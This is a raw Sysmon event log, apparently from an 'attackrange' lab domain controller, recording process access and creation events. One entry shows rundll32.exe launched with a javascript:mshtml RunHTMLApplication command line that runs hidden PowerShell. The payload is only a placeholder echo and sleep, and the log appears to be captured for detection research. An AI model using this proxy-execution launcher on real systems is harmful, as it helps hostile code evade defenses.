10341000x800000000000000026275Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.835{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026274Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.788{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026273Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.788{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000026272Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.741{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_kmrir2n0.55f.ps12021-01-20 15:59:35.741 10341000x800000000000000026271Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.741{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026270Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.694{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5367-6008-6706-00000000A301}2832C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026269Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.694{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5367-6008-6706-00000000A301}2832C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026268Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.694{7901BC46-5367-6008-6706-00000000A301}28324296C:\Windows\system32\conhost.exe{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026267Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.678{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5367-6008-6706-00000000A301}2832C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026266Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.678{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026265Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.678{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026264Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.678{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026263Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.678{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026262Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.678{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026261Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.678{7901BC46-5367-6008-6506-00000000A301}21565608C:\Windows\System32\rundll32.exe{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+8d00c|C:\Windows\System32\shell32.dll+114fd7|C:\Windows\System32\shell32.dll+114f35|C:\Windows\System32\wshom.ocx+c10d|C:\Windows\System32\wshom.ocx+be11|C:\Windows\System32\OLEAUT32.dll+2306f|C:\Windows\System32\OLEAUT32.dll+c2e5|C:\Windows\System32\OLEAUT32.dll+c836|C:\Windows\System32\OLEAUT32.dll+ce27|C:\Windows\System32\OLEAUT32.dll+ce27 154100x800000000000000026260Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.686{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";a=new%20ActiveXObject("WScript.Shell");a.Run("powershell.exe%20-nop%20-Command%20Write-Host%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%20Start-Sleep%20-Seconds%202;%20exit",0,true);close(); 10341000x800000000000000026259Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.647{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026258Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.647{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026257Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.647{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026256Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.631{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026255Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.631{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026254Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.631{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026253Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.631{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026252Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.616{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026251Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.616{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026250Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.616{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026249Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.616{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026248Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.616{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026247Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.616{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026246Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000026245Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.617{7901BC46-5367-6008-6506-00000000A301}2156C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication 